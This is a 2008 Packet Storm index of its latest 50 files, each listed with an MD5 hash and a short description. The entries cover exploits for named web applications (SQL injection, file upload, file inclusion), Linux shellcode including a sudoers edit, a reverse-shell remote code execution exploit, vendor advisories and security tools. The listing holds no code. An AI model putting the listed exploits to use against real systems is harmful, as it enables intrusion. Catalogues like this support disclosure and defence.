Packet Storm's last 50 added files.
Last Updated: Thu Nov 20 15:30:34 EST 2008


[ return-to-libc-linux.txt ] acf1023db639cd181a4dceb740a63236 Brief whitepaper discussing return to LIBC exploitation on Linux.  
[ stack-overflow-linux.txt ] 543012dabf952e42181c2d4cb8c71714 Brief whitepaper discussing stack overflow exploit on Linux.  
[ backlinkspider-sql.txt ] 4a61726e2c223e482fc8c834067d96b7 The BackLinkSpider Exchange Links script suffers from remote SQL injection vulnerabilities in links.asp and links.php.  
[ exodus-injection.txt ] c0c091b687a3e2eccfb4d3201993ab31 Exodus version 0.10 suffers from an URI handler arbitrary parameter injection vulnerability.  
[ smallest_setuid_execve_sc.c ] 555182da9a4a0a07f261cc1b9a164f39 26 byte (the smaller) GNU/Linux x86 setuid/execve shellcode without NULLs.  
[ wportfolio-upload.txt ] a6d0b79dc4160fd1a42267f9f46dbf37 wPortfolio versions 0.3 and below remote arbitrary file upload exploit.  
[ boastmachine-sql.txt ] a68e3a773a51a05f93575744cf367a59 BoastMachine version 3.1 suffers from a remote SQL injection vulnerability.  
[ SSRT080059.txt ] 95772fbd64f5296b53746839ca3c082f HP Security Bulletin - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM).The vulnerabilities could be exploited remotely to allow cross site scripting (XSS).  
[ punportal-lfi.txt ] c74197b9cc2ffa66839c60e8759a6b6a PunPortal PunBB module version 0.1 local file inclusion exploit.  
[ prejobboard-sql.txt ] cce036725cb757bbdfeadad1f0e18b75 Pre Job Board suffers from a SQL injection vulnerability that allows for authentication bypass.  
[ MDVSA-2008-220-1.txt ] d32925083aefe39798a9b266a8cf683e Mandriva Linux Security Advisory 2008-220-1 - Some vulnerabilities were discovered and corrected in the Linux 2.6 kernel. The issues include insecure misconfigurations, an integer overflow, and more.  
[ MDVSA-2008-232.txt ] 74d6e20e2de494366564f42bf606f8cb Mandriva Linux Security Advisory 2008-232 - The ACL plugin in dovecot prior to version 1.1.4 treated negative access rights as though they were positive access rights, which allowed attackers to bypass intended access restrictions. The ACL plugin in dovecot prior to version 1.1.6 allowed attackers to bypass intended access restrictions by using the 'k' right to create unauthorized 'parent/child/child' mailboxes.  
[ USN-674-1.txt ] 40785ad48c0633533c0dbc0debeac5a5 Ubuntu Security Notice USN-674-1 - It was discovered that the hpssd tool of hplip did not validate privileges in the alert-mailing function. A local attacker could exploit this to gain privileges and send e-mail messages from the account of the hplip user. This update alters hplip behavior by preventing users from setting alerts and by moving alert configuration to a root-controlled /etc/hp/alerts.conf file. It was discovered that the hpssd tool of hplip did not correctly handle certain commands. A local attacker could use a specially crafted packet to crash hpssd, leading to a denial of service.  
[ dsa-1667-1.txt ] fdd93fd43d34cbb3a7fa480d18402fca Debian Security Advisory 1667-1 - Several vulnerabilities have been discovered in the interpreter for the Python language.  
[ revsense-sql.txt ] 6aa053d65dd314b32171368e6bf84ae6 RevSense suffers from a remote SQL injection vulnerability that allows for authentication bypass.  
[ maurycms-upload.txt ] 63cc458d0d8e69152b1c8c27b36a2bf7 MauryCMS versions 0.53.2 and below remote shell upload exploit.  
[ linksautomation-sql.txt ] 0ff9ea758f37cbf93c812e824cb8af98 LinksAutomation Script suffers from a remote SQL injection vulnerability.  
[ linksxs-sql.txt ] 165976435e2cf54668de8896135ccc8e Linksxs Script suffers from a remote SQL injection vulnerability.  
[ ethiclinks-sql.txt ] 840182c3b5760545c2554f36f44507c5 Ethiclinks suffers from a remote SQL injection vulnerability.  
[ easyeditcms-sql.txt ] ddd126108668940b95b0c3f58edc0366 Easyedit CMS suffers from multiple remote SQL injection vulnerabilities.  
[ msvista-overflow.txt ] 8d9062372b98a602f3a22fe236506963 The Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory. Proof of concept test code included.  
[ mytopix-sql.txt ] 8e0559a875dc85728184e0a26a62eb96 MyTopix versions 1.3.0 and below remote SQL injection exploit.  
[ punbb-lfi.txt ] 4e17d4daf83b92da03922224ce17aa79 PunBB (Private Messaging System versions 1.2.x) multiple local file inclusion exploit.  
[ PR08-09.txt ] 027955185dafd3359535c914e02f64fa An unauthenticated file retrieval vulnerability exists on the Sun Java System Identity Manager.  
[ PR07-40.txt ] de90de2dfb7bb15c9207cdcfb1dc6b7e The 3Com AP 8760 suffers from authentication bypass, password leakage, and SNMP injection vulnerabilities. Details provided.  
[ PR07-11.txt ] 8a27d91e43fbb3bc2fb530f8741b2c77 Sun Java System Identity suffers from a cross site request forgery vulnerability. Proof of concept code included.  
[ secunia-streamripper.txt ] 2a667b6f5ea4090920bfdfceb7fa6c61 Secunia Research has discovered some vulnerabilities in Streamripper, which can be exploited by malicious people to compromise a user's system. Version 1.63.5 is affected.  
[ tonline-multi.txt ] 4f545cb45287d94079f395be11241a87 The T-Online software offered by Deutsche Telekom installs and includes the use of vulnerable DLLs.  
[ sudoers-shellcode.txt ] 75ac9ea204450e8db590b8f578f55103 86 byte Linux/x86 edit /etc/sudoers for full access.  
[ pysumpas-0.2.0.tar.gz ] 9c1a5f0718d2f7566344fdd2ba118882 PySumpas is a simple, graphical password generating utility. Using the Python Cryptography Toolkit and Damien Miller's py-bcrypt, it generates a hash or cipher from user input. The resulting output, in part or entirety, can be used as a secure password.  
[ alexarticle-upload.txt ] 8fa701b438aefcdc974a713bbb55d89a Alex Article-Engine version 1.3.0 suffers from a remote arbitrary file upload vulnerability.  
[ alexnews-upload.txt ] 71f4fe9cb8a232d39997f21b36f87ebf Alex News-Engine version 1.5.1 suffers from a remote arbitrary file upload vulnerability.  
[ framework-3.2.tar.gz ] d543bda031b36a247912aa9c6a0f74d9 The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler. 
[ MDVSA-2008-231.txt ] 3c2bacdc0c614a94c24a9030e3f7f962 Mandriva Linux Security Advisory 2008-231 - Drew Yaro of the Apple Product Security Team found two flaws in libxml2. The first is a denial of service flaw in libxml2's XML parser. If an application linked against libxml2 were to process certain malformed XML content, it cause the application to enter an infinite loop. The second is an integer overflow that caused a heap-based buffer overflow in libxml2's XML parser. If an application linked against libxml2 were to process certain malformed XML content, it could cause the application to crash or possibly execute arbitrary code. The updated packages have been patched to correct these issues.  
[ USN-673-1.txt ] 64f6a2da847d9cc80f75dd91c5ce02f7 Ubuntu Security Notice USN-673-1 - Drew Yao discovered that libxml2 did not correctly handle certain corrupt XML documents. If a user or automated system were tricked into processing a malicious XML document, a remote attacker could cause applications linked against libxml2 to enter an infinite loop, leading to a denial of service. Drew Yao discovered that libxml2 did not correctly handle large memory allocations. If a user or automated system were tricked into processing a very large XML document, a remote attacker could cause applications linked against libxml2 to crash, leading to a denial of service.  
[ DSECRG-08-039.txt ] 75fd4e17221c2d6c784ac7ab1a410e8b Pluck CMS version 4.5.3 suffers from a local file inclusion vulnerability in data/inc/lib/pcltar.lib.php.  
[ strongswan-4.2.9.tar.gz ] cf477bf5da424489e4d3cbff9c561eb7 strongSwan is a complete IPsec and IKEv1 implementation for Linux 2.4 and 2.6 kernels. It interoperates with most other IPsec-based VPN products. It is a descendant of the discontinued FreeS/WAN project. The focus of the strongSwan project is on strong authentication mechanisms using X.509 public key certificates and optional secure storage of private keys on smartcards through a standardized PKCS#11 interface. A unique feature is the use of X.509 attribute certificates to implement advanced access control schemes based on group memberships. 
[ hodetector-shellcode.txt ] ec01d4ed393174d135c4ba3ee033f19e Ho' Detector is shellcode that detects sniffing on all interfaces in Linux by parsing /proc/net/packet.  
[ directory-rfi.txt ] 7f8bed2e75d5eaeb1c1b72536868bae2 Free Directory Script version 1.1.1 suffers from a remote file inclusion vulnerability.vulnerability.  
[ CESA-2008-009.html ] a5218b3dbe84d9457e5d725d2e5b90c9 Firefox versions 2.0.0.18 and below and WebKit nightly are affected by a cross-domain arbitrary image theft vulnerability.   
[ cups-dos.txt ] 1ef452ec2c616d611a578d9e2fb24e5e CUPS version 1.3.7 cross site request forgery remote crash exploit that makes use of the add rss subscription functionality.  
[ SSRT080164.txt ] af2cc68c5723cced78fc00d623c7ba29 HP Security Bulletin - Various potential security vulnerabilities have been identified in Microsoft software that is running on the Storage Management Appliance (SMA). Some of these vulnerabilities may be pertinent to the SMA, please check the table in the Resolution section of this Security Bulletin.  
[ etopbizlinkback-insecure.txt ] 3d645ee9d2340964a69cb6cb2555b35a E-topbiz Link Back Checker 1 suffers from an insecure cookie handling vulnerability that allows for administrative take-over.  
[ Vulnerability_Advisory_SSH.txt ] 16c645098b7071120522e483e24bd2dc A design flaw in the SSH specification allows an attacker with control over the network to recover up to 32 bits of plaintext from an SSH-protected connection in the standard configuration. The vulnerability has been verified against OpenSSH 4.7p1; other versions may also be susceptible.  
[ musicbox238-sql.txt ] 0cfd65ddce5aa54f6ea1a290f20efd38 Musicbox versions 2.3.8 and below suffer from a remote SQL injection vulnerability. This was discovered in the last version and the vendor still has not fixed it.  
[ noIPwn3r.c ] 94f7539a2f526191e3041ebd0c0eaa10 No-IP DUC versions 2.1.7 and below remote code execution exploit with reverse shell functionality.  
[ USN-672-1.txt ] 157f26b3a109779716d5541904cd8ff7 Ubuntu Security Notice USN-672-1 - Moritz Jodeit discovered that ClamAV did not correctly handle certain strings when examining a VBA project. If a remote attacker tricked ClamAV into processing a malicious VBA file, ClamAV would crash, leading to a denial of service.  
[ USN-667-1.txt ] d2b66e3a70af631dd3be6f985f566dab Ubuntu Security Notice USN-667-1 - A large amount of vulnerabilities have been addressed in Firefox. Flaws such as information disclosure, bypassing of same-origin checks, arbitrary code execution, and more exist in prior versions.  
[ rtm-essential5.pdf ] 3c9e911783a5d2349ab31f835294d08d Road Technological Minds - Essential #5 - This issue covers fuzzing, remote file inclusion, Samurai Framework testing, and more. Written in Spanish.  
[ videoscript-password.txt ] 120245d21bb302fad23e901c4a649add VideoScript versions 4.0.1.50 and below administrative password changing exploit.